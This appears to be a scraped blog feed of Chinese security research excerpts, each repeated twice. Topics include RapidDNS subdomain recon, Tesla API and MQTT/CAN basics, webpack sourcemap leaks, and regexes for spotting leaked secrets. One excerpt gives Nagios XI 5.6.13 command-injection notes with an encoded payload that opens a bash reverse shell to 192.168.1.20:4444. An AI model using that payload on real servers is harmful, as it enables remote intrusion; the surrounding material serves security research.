作为车联网安全研究来说,充电桩作为车联网必要组成部分,具备实际的研究价值与意义。而面临如此多的品牌,选择哪个目标作为研究对象是面临的第一个问题。为了能够更快的实现我选择了几个衡量指标,包括官方有响应中心、固件可下载、市面上可以买到、互联网上有暴露的目标。分别对应合法性、静态分析、动态测试、漏洞可产生实际的影响。
根据指标通过网络上去收集信息,最终将目标锁定在施耐德。同时,施耐德也在CVE官方的CNA列表中,报送的漏洞可以获得CVE编号。
确定了要研究的对象,接下来就要确定一下我们要实现什么样的效果。这可以使得在分析过程中保持聚焦,不偏离方向。目标设定如下:
根据上述设定最直接的方式就是寻找远程命令执行漏洞,即要RCE类型漏洞。
一切准备就绪,开始我们的漏洞挖掘之旅。
]]>作为车联网安全研究来说,充电桩作为车联网必要组成部分,具备实际的研究价值与意义。而面临如此多的品牌,选择哪个目标作为研究对象是面临的第一个问题。为了能够更快的实现我选择了几个衡量指标,包括官方有响应中心、固件可下载、市面上可以买到、互联网上有暴露的目标。分别对应合法性、静态分析、动态测试、漏洞可产生实际的影响。
根据指标通过网络上去收集信息,最终将目标锁定在施耐德。同时,施耐德也在CVE官方的CNA列表中,报送的漏洞可以获得CVE编号。
确定了要研究的对象,接下来就要确定一下我们要实现什么样的效果。这可以使得在分析过程中保持聚焦,不偏离方向。目标设定如下:
根据上述设定最直接的方式就是寻找远程命令执行漏洞,即要RCE类型漏洞。
一切准备就绪,开始我们的漏洞挖掘之旅。
]]>今天来分享点关于RapidDNS使用的小技巧。
将以下命令加入到 bash_profile
文件中。
rapiddns(){
curl -s "https://rapiddns.io/subdomain/$1?full=1" \
| grep -oP '_blank">\K[^<]*' \
| grep -v http \
| sort -u
}
然后后面就可以使用rapiddns命令直接查询结果。
rapiddns tesla.com
今天来分享点关于RapidDNS使用的小技巧。
将以下命令加入到 bash_profile
文件中。
rapiddns(){
curl -s "https://rapiddns.io/subdomain/$1?full=1" \
| grep -oP '_blank">\K[^<]*' \
| grep -v http \
| sort -u
}
然后后面就可以使用rapiddns命令直接查询结果。
rapiddns tesla.com
此次的CTF题大部分都提供源代码,并提供有Dockerfile文件,可通过docker build构建并运行。通过源码可知源代码为Java语言。openjdk 1.8.181版本,Web Server为Tomcat10。
]]>此次的CTF题大部分都提供源代码,并提供有Dockerfile文件,可通过docker build构建并运行。通过源码可知源代码为Java语言。openjdk 1.8.181版本,Web Server为Tomcat10。
]]>RapidDNS.io是一个在线域名查询和IP反向查询的网站。有超过25亿条记录,支持5种(A,AAAA,CNAME,MX,CERT)数据类型。到目前为止,网站全球Alexa排名15万左右并累计提供超过1亿次查询。现每月网站流量超过1TB。除此之外网站也被加入到Amass,OneForAll,theHarvester,Sudomy,subfinder,ksubdomain等众多知名开源项目中。
接下来我就跟大家分享建设这个网站的过程。
2020年在做子域名收集的开发时,想起了Rapid7的DNS数据。经过对其进行分析后,确认是我需要的内容。于是便有了做一个在线的网站的想法,即方便自己同时又可以方便其他有需要的人。
有了这个想法后就开始计划目标,确定只做子域名查询和IP地址反查。其实在开发时,想自己跑数据,但是资源有限。就决定先以Rapid7的DNS数据来尝试。后续也可根据具体情况在增加功能。
开始实现之前要考虑如何以最低的成本实现最好的效果。最好的效果即在多人同时访问时保证查询速度和系统稳定。因为这将直接决定采用什么样的架构来实现。
先来分析下建设网站需要的东西。包括一个域名和至少一台服务器,用来存放web和数据。数据存储的空间至少要300gb,cpu至少双核,内存至少4g。这是没有增量和保存历史记录的情况。到各家云厂商,idc机房,根据这个配置对比了其价格,最低的服务器成本也要5000块一年(仅是数据存储)。
因为打算做免费网站,这样的成本超出了我的预期,而且也可能性能不够。对于这个数据,国外已经有几篇数据运用的文章。其实现的思路有:1. 采用aws的Athena实现,2. 开源的DNSGrep,包括RapidDNS上线后采用mongodb实现的开源项目等。因为大多数围绕的是子域名查询,没有IP地址反查功能。而且Athena将随着用户数量增加,其费用也将非常恐怖,更适合自用。说了这么多,主要的问题说白了就是穷。
另外一个省钱的思路就是从已有资源来想办法,这时想到了跟随我多年联想的笔记本电脑,它已经吃灰好久了,这是一个可利用的资源。这样只需要再买一个web服务器就可以了。根据之前调查的价格,这样的服务器一年大概需要不到2000块。
但是这就产生了另外一个问题,家里的网络是光纤,没有固定ip地址,而且之前测试发现外网ip是无法直接访问的,映射端口是不行的。做端口转发?这个的性能没测试过,无法保证,也不打算采用。当然这里我想到了一个解决办法,在下面的内容中会讲到。
经过上面的考虑,最终我采用下面的结构。后来经过线上的运行情况,稳定性和查询速度还在接受的范围内。后续也可以增加worker和消息队列来支持其他方式的数据增加。
本地服务器就是我的一台笔记本电脑,其配置是3代i7,8G内存。1.2TB的固态硬盘(1TB+250TB两块组成)。数据存储与查询使用的是elasticsearch,前面加了一层nginx,并配置了认证。
外部服务器是一台云主机,配置好为双核4G内存。包括nginx反向代理和Flask做的web查询界面。 外面又加了一层CDN。上面没有公网IP的问题,取了个巧,因为现在家里的网络都支持IPv6,所以外部服务器直接使用IPv6地址直连家里的笔记本电脑。
这里说点额外的,对于IPv6地址是可以直接连接的,不需要做映射。一般我们家里的电脑会分配多个IPv6地址,有至少一个临时(temporary,我们连接其他电脑时使用)的地址和secured的。一般我们可以设置一个固定的即可。这里大家还是注意点,避免泄漏IPv6地址。之前看一篇公众号文章,发现对目标的IPv4地址打码了,却没有对IPv6地址打码,这个挺危险的。
以上这套结构的成本为域名450元,cdn服务器免费的,服务器每月费用20美元(差不多140元),电费每月大概60元。前期投入买了一块三星的SSD,成本1000元。截止目前为止,共投入450+2400+1000=3850元。后续维持现状基本是服务器加域名成本,一年2850元。
需要的一些基础知识:
其实想好了方案,而且本身也不复杂,具体编码就相对简单了许多。比如查询界面的开发,我直接找了一套现成的模版,改改样式就可以了。后端flask边看文档边开发就可以了,没啥好说的。唯一要说一下的是这里flask使用了协程,其查询效果好了很多。当然后面跟insight-labs的A牛沟通过可以换bjoern,据说效果很好,不过这个我没测试,感兴趣的可以试试看,看完也可以分享出来让我学习学习。
主要的还是在Elasticsearch这里,这里选择他主要因为我比较熟悉,而且有IP字段类型,做IP段查询时非常方便。这里换乘其他的如mongodb、mysql等也可以。mysql使用myisam,加上Partition问题也不大,Insight-labs的QQ群数据查询就是成功案例。大家可以选择自己擅长的。
后来有朋友过来交流查询速度问题,说他那边的查询速度没我的快。其实主要我这边做了一些优化处理。我在导入数据时,对域名处理,将根域名单独存放一个字段,剩下的部分单独放一个字段。因为不需要模糊匹配,查询速度就会非常快,同时存储空间也可以节省几十G。当然,这牺牲掉了模糊搜索的功能。具体字段可以看下图:
创建mapping:
{
"mappings": {
"domain": {
"properties": {
"name": {
"type": "text"
},
"type": {
"type": "keyword"
},
"value": {
"type": "ip"
},
"domain": {
"type": "keyword"
}
}
}
}
}
最关键的其实是导入程序,也是投入时间最多的,因为数据量比较多。单纯使用bulk速度很慢。使用SSD速度会提高几倍。但是依然达不到预期,因为会出现es内存耗尽,队列太多等各种异常,比如导入到8亿多数据时报错。也尝试通过迭代的方式来实现高性能文件读取,但是最后主要的根源还是在es和字符串的处理上。最后采用多进程方式。elasticsearch设置不刷新,0副本,并调整es的queue,线程,最大内存等参数。这个需要根据自己机器配置去进行调整。通过实际使用一天导入大概10亿条记录,当然还是有优化空间的。
修改index设置的方法:
{
"index": {
"refresh_interval": -1,
"number_of_replicas": 0
}
}
导入完成后在修改回去即可。
以上elasticsearch使用的是6.7.1版本。其他版本可能会有差异,根据实际情况调整即可。
其实总体来说,本文技术上没啥复杂度,实现起来也相对简单。我觉得有点像以前革命时期八路军的风格(完了往自己脸上贴金了,勿喷),在有限的条件下来尽可能实现自己想要的效果。
希望本文对你有所帮助,对于上述内容有任何疑问,可以给我发送消息一起交流。
最后,RapidDNS已经一周年,这一年家人和同事的支持,同学的帮助,以及国内外朋友的称赞和鼓励,才让我坚持维护着网站运行。感谢在网站运行中大家提来的建议和反馈!感谢所有使用RapidDNS的人!感谢你们让RapidDNS更好。
所以,RapidDNS现有查询功能将一直免费开放下去,同时新的一年我也会增加新的功能,也欢迎大家发来你们的建议和想法。
大家也可以关注公众账号,获取最新的网站功能、使用技巧等内容。
RapidDNS.io是一个在线域名查询和IP反向查询的网站。有超过25亿条记录,支持5种(A,AAAA,CNAME,MX,CERT)数据类型。到目前为止,网站全球Alexa排名15万左右并累计提供超过1亿次查询。现每月网站流量超过1TB。除此之外网站也被加入到Amass,OneForAll,theHarvester,Sudomy,subfinder,ksubdomain等众多知名开源项目中。
接下来我就跟大家分享建设这个网站的过程。
2020年在做子域名收集的开发时,想起了Rapid7的DNS数据。经过对其进行分析后,确认是我需要的内容。于是便有了做一个在线的网站的想法,即方便自己同时又可以方便其他有需要的人。
有了这个想法后就开始计划目标,确定只做子域名查询和IP地址反查。其实在开发时,想自己跑数据,但是资源有限。就决定先以Rapid7的DNS数据来尝试。后续也可根据具体情况在增加功能。
开始实现之前要考虑如何以最低的成本实现最好的效果。最好的效果即在多人同时访问时保证查询速度和系统稳定。因为这将直接决定采用什么样的架构来实现。
先来分析下建设网站需要的东西。包括一个域名和至少一台服务器,用来存放web和数据。数据存储的空间至少要300gb,cpu至少双核,内存至少4g。这是没有增量和保存历史记录的情况。到各家云厂商,idc机房,根据这个配置对比了其价格,最低的服务器成本也要5000块一年(仅是数据存储)。
因为打算做免费网站,这样的成本超出了我的预期,而且也可能性能不够。对于这个数据,国外已经有几篇数据运用的文章。其实现的思路有:1. 采用aws的Athena实现,2. 开源的DNSGrep,包括RapidDNS上线后采用mongodb实现的开源项目等。因为大多数围绕的是子域名查询,没有IP地址反查功能。而且Athena将随着用户数量增加,其费用也将非常恐怖,更适合自用。说了这么多,主要的问题说白了就是穷。
另外一个省钱的思路就是从已有资源来想办法,这时想到了跟随我多年联想的笔记本电脑,它已经吃灰好久了,这是一个可利用的资源。这样只需要再买一个web服务器就可以了。根据之前调查的价格,这样的服务器一年大概需要不到2000块。
但是这就产生了另外一个问题,家里的网络是光纤,没有固定ip地址,而且之前测试发现外网ip是无法直接访问的,映射端口是不行的。做端口转发?这个的性能没测试过,无法保证,也不打算采用。当然这里我想到了一个解决办法,在下面的内容中会讲到。
经过上面的考虑,最终我采用下面的结构。后来经过线上的运行情况,稳定性和查询速度还在接受的范围内。后续也可以增加worker和消息队列来支持其他方式的数据增加。
本地服务器就是我的一台笔记本电脑,其配置是3代i7,8G内存。1.2TB的固态硬盘(1TB+250TB两块组成)。数据存储与查询使用的是elasticsearch,前面加了一层nginx,并配置了认证。
外部服务器是一台云主机,配置好为双核4G内存。包括nginx反向代理和Flask做的web查询界面。 外面又加了一层CDN。上面没有公网IP的问题,取了个巧,因为现在家里的网络都支持IPv6,所以外部服务器直接使用IPv6地址直连家里的笔记本电脑。
这里说点额外的,对于IPv6地址是可以直接连接的,不需要做映射。一般我们家里的电脑会分配多个IPv6地址,有至少一个临时(temporary,我们连接其他电脑时使用)的地址和secured的。一般我们可以设置一个固定的即可。这里大家还是注意点,避免泄漏IPv6地址。之前看一篇公众号文章,发现对目标的IPv4地址打码了,却没有对IPv6地址打码,这个挺危险的。
以上这套结构的成本为域名450元,cdn服务器免费的,服务器每月费用20美元(差不多140元),电费每月大概60元。前期投入买了一块三星的SSD,成本1000元。截止目前为止,共投入450+2400+1000=3850元。后续维持现状基本是服务器加域名成本,一年2850元。
需要的一些基础知识:
其实想好了方案,而且本身也不复杂,具体编码就相对简单了许多。比如查询界面的开发,我直接找了一套现成的模版,改改样式就可以了。后端flask边看文档边开发就可以了,没啥好说的。唯一要说一下的是这里flask使用了协程,其查询效果好了很多。当然后面跟insight-labs的A牛沟通过可以换bjoern,据说效果很好,不过这个我没测试,感兴趣的可以试试看,看完也可以分享出来让我学习学习。
主要的还是在Elasticsearch这里,这里选择他主要因为我比较熟悉,而且有IP字段类型,做IP段查询时非常方便。这里换乘其他的如mongodb、mysql等也可以。mysql使用myisam,加上Partition问题也不大,Insight-labs的QQ群数据查询就是成功案例。大家可以选择自己擅长的。
后来有朋友过来交流查询速度问题,说他那边的查询速度没我的快。其实主要我这边做了一些优化处理。我在导入数据时,对域名处理,将根域名单独存放一个字段,剩下的部分单独放一个字段。因为不需要模糊匹配,查询速度就会非常快,同时存储空间也可以节省几十G。当然,这牺牲掉了模糊搜索的功能。具体字段可以看下图:
创建mapping:
{
"mappings": {
"domain": {
"properties": {
"name": {
"type": "text"
},
"type": {
"type": "keyword"
},
"value": {
"type": "ip"
},
"domain": {
"type": "keyword"
}
}
}
}
}
最关键的其实是导入程序,也是投入时间最多的,因为数据量比较多。单纯使用bulk速度很慢。使用SSD速度会提高几倍。但是依然达不到预期,因为会出现es内存耗尽,队列太多等各种异常,比如导入到8亿多数据时报错。也尝试通过迭代的方式来实现高性能文件读取,但是最后主要的根源还是在es和字符串的处理上。最后采用多进程方式。elasticsearch设置不刷新,0副本,并调整es的queue,线程,最大内存等参数。这个需要根据自己机器配置去进行调整。通过实际使用一天导入大概10亿条记录,当然还是有优化空间的。
修改index设置的方法:
{
"index": {
"refresh_interval": -1,
"number_of_replicas": 0
}
}
导入完成后在修改回去即可。
以上elasticsearch使用的是6.7.1版本。其他版本可能会有差异,根据实际情况调整即可。
其实总体来说,本文技术上没啥复杂度,实现起来也相对简单。我觉得有点像以前革命时期八路军的风格(完了往自己脸上贴金了,勿喷),在有限的条件下来尽可能实现自己想要的效果。
希望本文对你有所帮助,对于上述内容有任何疑问,可以给我发送消息一起交流。
最后,RapidDNS已经一周年,这一年家人和同事的支持,同学的帮助,以及国内外朋友的称赞和鼓励,才让我坚持维护着网站运行。感谢在网站运行中大家提来的建议和反馈!感谢所有使用RapidDNS的人!感谢你们让RapidDNS更好。
所以,RapidDNS现有查询功能将一直免费开放下去,同时新的一年我也会增加新的功能,也欢迎大家发来你们的建议和想法。
大家也可以关注公众账号,获取最新的网站功能、使用技巧等内容。
首先说一下结果,一个SQL注入(可报错回显)、弱口令(审核后发现是域名解析IP错误)和一个有限的SSRF漏洞。
当然今天我要说的不是直接查询子域名,那就没必要写这篇文章了。
像鹅厂这样规模的企业,其资产数量众多。同样的,其盯着他的大佬们也非常多。而目前收集信息的方法大多数都差不多。本身厂商自己也会对其进行监控、检测。基本上很多被筛选了很多遍。那应该如何去挖掘呢?其中一种思路就是找到别人未发现的一些资产,这将增加挖掘的概率。
RapidDNS网站在2020年12月的时候增加了5000万的HTTPS证书数据。暂时还没有对证书查询独立(将在新上线的版本独立查询)。
]]>首先说一下结果,一个SQL注入(可报错回显)、弱口令(审核后发现是域名解析IP错误)和一个有限的SSRF漏洞。
当然今天我要说的不是直接查询子域名,那就没必要写这篇文章了。
像鹅厂这样规模的企业,其资产数量众多。同样的,其盯着他的大佬们也非常多。而目前收集信息的方法大多数都差不多。本身厂商自己也会对其进行监控、检测。基本上很多被筛选了很多遍。那应该如何去挖掘呢?其中一种思路就是找到别人未发现的一些资产,这将增加挖掘的概率。
RapidDNS网站在2020年12月的时候增加了5000万的HTTPS证书数据。暂时还没有对证书查询独立(将在新上线的版本独立查询)。
]]>网站自发布以来,一直没有什么说明和教程。因为它的功能非常单一,不需要做太多介绍。但是呢,有一些小细节和场景,我觉得可以分享下。
首先,网站基础功能可以查询网站子域名,根据IP地址或IP段查询绑定的域名信息,这里支持IPv6的地址和地址段。目前最大支持显示1万条(大多数情况下足够了)。其中查询结果页面中有导出csv的功能,可以导出全部结果。其实不导出,查询全部结果只需要加入参数?full=1即可。目前大多数开源工具采集时采用也是这样的方式。
下面来说下实际应用场景。
在收集ASN信息时,可以根据反向IP段查询,迅速确定筛选出目标的资产。
比如下图中搜索到的腾讯结果中,有很多ip段时属于腾讯云服务的机器,这些IP对我们挖掘漏洞来说,意义不大。但是可能又会存在夹杂在其中的个别目标。这时候就可以使用Reverse IP功能进行查询,然后筛选出目标或者筛选IP段。
下面随便挑了一个(58.87.64.0/18)查询结果来展示下,发现大多数不是腾讯的域名,则可以跳过,或者从中筛选出腾讯的。
这里主要说两个场景,第一个就是扫到某个IP存在漏洞,想知道哪个厂商的,第二个就是对于攻击IP地址是属于哪个机构的。这是两个非常常见的需求。
这里一种方法是直接查询IP地址,那么,当ip地址查不到时怎么办呢?
今天就在微信群里遇到一个例子。有人在日志中发现了360某团队的一个dnslog的地址,但是打开其域名时一个空白地址。这里我通过获取到解析的IP地址,查询C段,然后很快速的发现了dnslog平台的登录地址,根据版权信息确认是360的。
其发现的地址形如:xxx.b.nslog.0kee.360.cn。访问nslog.0kee.360.cn为空白,其解析的IP地址为123.59.211.124。通过RapidDNS来查询C段,查询链接:https://rapiddns.io/sameip/123.59.211.124/24#result。
在结果中可以发现一个0kdns.net的域名,访问后就是dnslog平台登录地址。
好了,以上就是我经常使用到的方法,跟大家分享出来。另外,网站由于网络原因,可能会不太稳定。有问题大家可即时反馈,看到后我会第一时间来解决。
扫描篇下方二维码可关注公众号
]]>网站自发布以来,一直没有什么说明和教程。因为它的功能非常单一,不需要做太多介绍。但是呢,有一些小细节和场景,我觉得可以分享下。
首先,网站基础功能可以查询网站子域名,根据IP地址或IP段查询绑定的域名信息,这里支持IPv6的地址和地址段。目前最大支持显示1万条(大多数情况下足够了)。其中查询结果页面中有导出csv的功能,可以导出全部结果。其实不导出,查询全部结果只需要加入参数?full=1即可。目前大多数开源工具采集时采用也是这样的方式。
下面来说下实际应用场景。
在收集ASN信息时,可以根据反向IP段查询,迅速确定筛选出目标的资产。
比如下图中搜索到的腾讯结果中,有很多ip段时属于腾讯云服务的机器,这些IP对我们挖掘漏洞来说,意义不大。但是可能又会存在夹杂在其中的个别目标。这时候就可以使用Reverse IP功能进行查询,然后筛选出目标或者筛选IP段。
下面随便挑了一个(58.87.64.0/18)查询结果来展示下,发现大多数不是腾讯的域名,则可以跳过,或者从中筛选出腾讯的。
这里主要说两个场景,第一个就是扫到某个IP存在漏洞,想知道哪个厂商的,第二个就是对于攻击IP地址是属于哪个机构的。这是两个非常常见的需求。
这里一种方法是直接查询IP地址,那么,当ip地址查不到时怎么办呢?
今天就在微信群里遇到一个例子。有人在日志中发现了360某团队的一个dnslog的地址,但是打开其域名时一个空白地址。这里我通过获取到解析的IP地址,查询C段,然后很快速的发现了dnslog平台的登录地址,根据版权信息确认是360的。
其发现的地址形如:xxx.b.nslog.0kee.360.cn。访问nslog.0kee.360.cn为空白,其解析的IP地址为123.59.211.124。通过RapidDNS来查询C段,查询链接:https://rapiddns.io/sameip/123.59.211.124/24#result。
在结果中可以发现一个0kdns.net的域名,访问后就是dnslog平台登录地址。
好了,以上就是我经常使用到的方法,跟大家分享出来。另外,网站由于网络原因,可能会不太稳定。有问题大家可即时反馈,看到后我会第一时间来解决。
扫描篇下方二维码可关注公众号
]]>项目地址:
https://github.com/insightglacier/SourceMapX
该脚本主要由unwebpack-sourcemap项目修改而来,使用Python3编写,需要安装 BeautifulSoup4
and requests
.可以使用 pip3 install -r requirements.txt
命令进行安装。主要是修改为批量检测并下载,可用于SRC的漏洞挖掘。
项目地址:
https://github.com/insightglacier/SourceMapX
该脚本主要由unwebpack-sourcemap项目修改而来,使用Python3编写,需要安装 BeautifulSoup4
and requests
.可以使用 pip3 install -r requirements.txt
命令进行安装。主要是修改为批量检测并下载,可用于SRC的漏洞挖掘。
Tesla的召唤功能除自动召唤外,还支持手动的前进与后退功能。要想手机APP可以使用召唤功能,需要先在车机中开启召唤功能。
在测试时,建议寻找一块比较大的空地,然后设置抓包,使用手机APP进行操作。通过burpsuite抓到的数据包可知,召唤功能主要通过websocket来实现。但是分析过程中可以发现,burpsuite只显示了连接地址和发送的数据内容,并没有显示其请求的头,所以,当直接去连接时会返回401错误。
在这个时候就需要还一个工具了,本文选择使用charles。这个工具针对websocket的支持非常友好,不仅可以看到请求头,还针对发送与接收以不同的颜色区分显示出来,十分方便分析。
]]>Tesla的召唤功能除自动召唤外,还支持手动的前进与后退功能。要想手机APP可以使用召唤功能,需要先在车机中开启召唤功能。
在测试时,建议寻找一块比较大的空地,然后设置抓包,使用手机APP进行操作。通过burpsuite抓到的数据包可知,召唤功能主要通过websocket来实现。但是分析过程中可以发现,burpsuite只显示了连接地址和发送的数据内容,并没有显示其请求的头,所以,当直接去连接时会返回401错误。
在这个时候就需要还一个工具了,本文选择使用charles。这个工具针对websocket的支持非常友好,不仅可以看到请求头,还针对发送与接收以不同的颜色区分显示出来,十分方便分析。
]]>Tesla自身的app具备控车的一些功能,如解锁、温度控制、充电、行车轨迹、召唤功能等。那么可能有朋友要问了,分析app自己实现的意义是什么呢?为什么不用官方提供的app呢?而且Github也有大量开源项目。
最开始我也有同样的疑问,但是,当我去尝试了解后,发现分析api,自己可以拓展多种玩法:
挖掘潜在的隐藏功能。在漏洞挖掘过程中,总会有一些未在界面显示,被开发者隐藏起来的一些功能。这些功能一旦被我们发现,对漏洞挖掘或者实现额外的功能都有帮助。
实现批量控车功能。官方的APP同时只能控制一台汽车,无法控制多台。我们熟悉API后,我们则可以实现批量控制汽车,实现速度与激情中的控车场景,这想想都觉得很酷;
熟悉Tesla业务流程,可以深入去挖掘漏洞;
尽管目前网络上有很多Tesla的API代码或库,但是其他的车还没有。我们以Tesla为典型例子,可以将其思路和方法拓展到其他同类的汽车厂商中;
个性化定制,通过API可以按照自己习惯定制流程,控制更加灵活。还可以拓展功能,如雨天自动关闭天窗,根据情况自动制热/冷却等。甚至可以做成一个商业产品;
通过api调用,配合代理跳板实现隐藏自身,同时不会暴漏自己的imei、设备等,减少APP信息收集导致的隐私泄漏。
记录下所有关于车的数据,进行数据分析。
Tesla自身的app具备控车的一些功能,如解锁、温度控制、充电、行车轨迹、召唤功能等。那么可能有朋友要问了,分析app自己实现的意义是什么呢?为什么不用官方提供的app呢?而且Github也有大量开源项目。
最开始我也有同样的疑问,但是,当我去尝试了解后,发现分析api,自己可以拓展多种玩法:
挖掘潜在的隐藏功能。在漏洞挖掘过程中,总会有一些未在界面显示,被开发者隐藏起来的一些功能。这些功能一旦被我们发现,对漏洞挖掘或者实现额外的功能都有帮助。
实现批量控车功能。官方的APP同时只能控制一台汽车,无法控制多台。我们熟悉API后,我们则可以实现批量控制汽车,实现速度与激情中的控车场景,这想想都觉得很酷;
熟悉Tesla业务流程,可以深入去挖掘漏洞;
尽管目前网络上有很多Tesla的API代码或库,但是其他的车还没有。我们以Tesla为典型例子,可以将其思路和方法拓展到其他同类的汽车厂商中;
个性化定制,通过API可以按照自己习惯定制流程,控制更加灵活。还可以拓展功能,如雨天自动关闭天窗,根据情况自动制热/冷却等。甚至可以做成一个商业产品;
通过api调用,配合代理跳板实现隐藏自身,同时不会暴漏自己的imei、设备等,减少APP信息收集导致的隐私泄漏。
记录下所有关于车的数据,进行数据分析。
在整个物联网或车联网架构中,MQTT的部分通常应用在移动端、管理端、Web端、设备端。而MQTT协议中的三种角色是发布者(PUBLISHER)、订阅者(SUBCRIBER)、代理(BROKER)。发布者(PUBLISHER)和订阅者(SUBCRIBER)通过代理(BROKER)来发布和订阅消息。这两个角色在实际场景中主要应用是移动端、Web端、设备端;代理(BROKER)一般是服务器,可以由activemq、hivemq、emqx等许多软件来搭建。在开发过程中,不同的设备,技术特点也有所不同。其使用的协议除了mqtt外,Web端通常使用websocket的方式来进行收发消息。
目前对于MQTT的开发中的安全还尚未受到广泛关注,这使得有多种方式在移动端、Web端、设备端获取到MQTT的认证与连接信息。通过获取的信息来进一步实现越权访问、发布恶意内容等攻击。
]]>在整个物联网或车联网架构中,MQTT的部分通常应用在移动端、管理端、Web端、设备端。而MQTT协议中的三种角色是发布者(PUBLISHER)、订阅者(SUBCRIBER)、代理(BROKER)。发布者(PUBLISHER)和订阅者(SUBCRIBER)通过代理(BROKER)来发布和订阅消息。这两个角色在实际场景中主要应用是移动端、Web端、设备端;代理(BROKER)一般是服务器,可以由activemq、hivemq、emqx等许多软件来搭建。在开发过程中,不同的设备,技术特点也有所不同。其使用的协议除了mqtt外,Web端通常使用websocket的方式来进行收发消息。
目前对于MQTT的开发中的安全还尚未受到广泛关注,这使得有多种方式在移动端、Web端、设备端获取到MQTT的认证与连接信息。通过获取的信息来进一步实现越权访问、发布恶意内容等攻击。
]]>MQTT协议为大量计算能力有限,低带宽、不可靠网络等环境而设计,其应用非常广泛。目前支持的服务端程序也较丰富,其PHP,JAVA,Python,C,C#等系统语言也都可以向MQTT发送相关消息。 目前最新的版本为5.0版本,可以在https://github.com/mqtt/mqtt.github.io/wiki/servers 这个连接中看到支持MQTT的服务端软件。 其中hivemq中提到针对汽车厂商的合作与应用,在研究过程中会发现有汽车行业应用了MQTT协议。
以下列举我们关心的几项:
MQTT协议为大量计算能力有限,低带宽、不可靠网络等环境而设计,其应用非常广泛。目前支持的服务端程序也较丰富,其PHP,JAVA,Python,C,C#等系统语言也都可以向MQTT发送相关消息。 目前最新的版本为5.0版本,可以在https://github.com/mqtt/mqtt.github.io/wiki/servers 这个连接中看到支持MQTT的服务端软件。 其中hivemq中提到针对汽车厂商的合作与应用,在研究过程中会发现有汽车行业应用了MQTT协议。
以下列举我们关心的几项:
CAN(Controller Area Network)总线是制造业和汽车产业中使用的一种简单协议,为ISO国际标准化的串行通信协议。在现代汽车中的小型嵌入式系统和ECU能够使用CAN协议进行通信,其通信是采用的广播机制,与TCP协议中的UDP差不多。各个系统或ECU(电子控制单元)都可以收发控制消息。1996年起该协议成了美国轿车和轻型卡车的标准协议之一,但是直到2008年才成为强制标准(2001年成为欧洲汽车标准)。当然1996年之前的也有可能使用CAN总线。现在,汽车的电子组件均通过CAN总线连接,针对汽车的攻击最终也都会通过CAN总线来实现。对于研究汽车安全,CAN总线协议是必须要掌握的。
]]>CAN(Controller Area Network)总线是制造业和汽车产业中使用的一种简单协议,为ISO国际标准化的串行通信协议。在现代汽车中的小型嵌入式系统和ECU能够使用CAN协议进行通信,其通信是采用的广播机制,与TCP协议中的UDP差不多。各个系统或ECU(电子控制单元)都可以收发控制消息。1996年起该协议成了美国轿车和轻型卡车的标准协议之一,但是直到2008年才成为强制标准(2001年成为欧洲汽车标准)。当然1996年之前的也有可能使用CAN总线。现在,汽车的电子组件均通过CAN总线连接,针对汽车的攻击最终也都会通过CAN总线来实现。对于研究汽车安全,CAN总线协议是必须要掌握的。
]]>其实通过Google cache就可以绕过限制继续查看。
例如我们要查看下面的文章,发现看不了。
]]>其实通过Google cache就可以绕过限制继续查看。
例如我们要查看下面的文章,发现看不了。
]]>版本: 5.6.13(5.6.11版本也存在问题,只需要把最后文件名字中的 -
去掉)
条件:登陆后
漏洞文件相关路径:/includes/components/xicore/export-rrd.php、includes/utils-rrdexport.inc.php
漏洞参数:step、start、end
python3
requests库,使用pip3安装即可。python3 -m pip install requests
另外,如果需要执行自己的命令,需要修改commond变量就可以了,这里也懒得改了。脚本中的命令"1|(echo+\"YmFzaCAtaSA%2bJiAvZGV2L3RjcC8xOTIuMTY4LjEuMjAvNDQ0NCAwPiYx\"|base64+-d+|sh+-i);#"
其实就是执行的bash -i >& /dev/tcp/192.168.1.20/4444 0>&1
版本: 5.6.13(5.6.11版本也存在问题,只需要把最后文件名字中的 -
去掉)
条件:登陆后
漏洞文件相关路径:/includes/components/xicore/export-rrd.php、includes/utils-rrdexport.inc.php
漏洞参数:step、start、end
python3
requests库,使用pip3安装即可。python3 -m pip install requests
另外,如果需要执行自己的命令,需要修改commond变量就可以了,这里也懒得改了。脚本中的命令"1|(echo+\"YmFzaCAtaSA%2bJiAvZGV2L3RjcC8xOTIuMTY4LjEuMjAvNDQ0NCAwPiYx\"|base64+-d+|sh+-i);#"
其实就是执行的bash -i >& /dev/tcp/192.168.1.20/4444 0>&1
在实际渗透过程中,许多网站还是存在这种情况。通常一般是配置了devtool: 'source-map'
。
我们可以在js的文件名后面加上.map,如果在这种该文件,我们则可以通过工具解压缩webpack。
或者当我们一般看到类似这样的代码时,也基本可以对其进行解压缩。
]]>在实际渗透过程中,许多网站还是存在这种情况。通常一般是配置了devtool: 'source-map'
。
我们可以在js的文件名后面加上.map,如果在这种该文件,我们则可以通过工具解压缩webpack。
或者当我们一般看到类似这样的代码时,也基本可以对其进行解压缩。
]]>以下列表主要收集了一些大型互联网企业(腾讯、百度、滴滴、字节跳动、360、阿里巴巴、美团、京东等),然后经过人工整理出来,有遗漏在所难免,欢迎大家补充。
w.alikunlun.com
wsglb0.com
w.kunlunpi.com
elb.amazonaws.com
wswebpic.com
mig.tencent-cloud.net
cloud.tc.qq.com
qcloudcjgj.com
pop3.mxhichina.com
以下列表主要收集了一些大型互联网企业(腾讯、百度、滴滴、字节跳动、360、阿里巴巴、美团、京东等),然后经过人工整理出来,有遗漏在所难免,欢迎大家补充。
w.alikunlun.com
wsglb0.com
w.kunlunpi.com
elb.amazonaws.com
wswebpic.com
mig.tencent-cloud.net
cloud.tc.qq.com
qcloudcjgj.com
pop3.mxhichina.com
"aliyun_oss_url": "[\\w-.]\\.oss.aliyuncs.com"
"azure_storage": "https?://[\\w-\.]\\.file.core.windows.net"
"access_key": "[Aa](ccess|CCESS)_?[Kk](ey|EY)|[Aa](ccess|CCESS)_?[sS](ecret|ECRET)|[Aa](ccess|CCESS)_?(id|ID|Id)"
"secret_key": "[Ss](ecret|ECRET)_?[Kk](ey|EY)"
"slack_token": "(xox[p|b|o|a]-[0-9]{12}-[0-9]{12}-[0-9]{12}-[a-z0-9]{32})"
]]>"aliyun_oss_url": "[\\w-.]\\.oss.aliyuncs.com"
"azure_storage": "https?://[\\w-\.]\\.file.core.windows.net"
"access_key": "[Aa](ccess|CCESS)_?[Kk](ey|EY)|[Aa](ccess|CCESS)_?[sS](ecret|ECRET)|[Aa](ccess|CCESS)_?(id|ID|Id)"
"secret_key": "[Ss](ecret|ECRET)_?[Kk](ey|EY)"
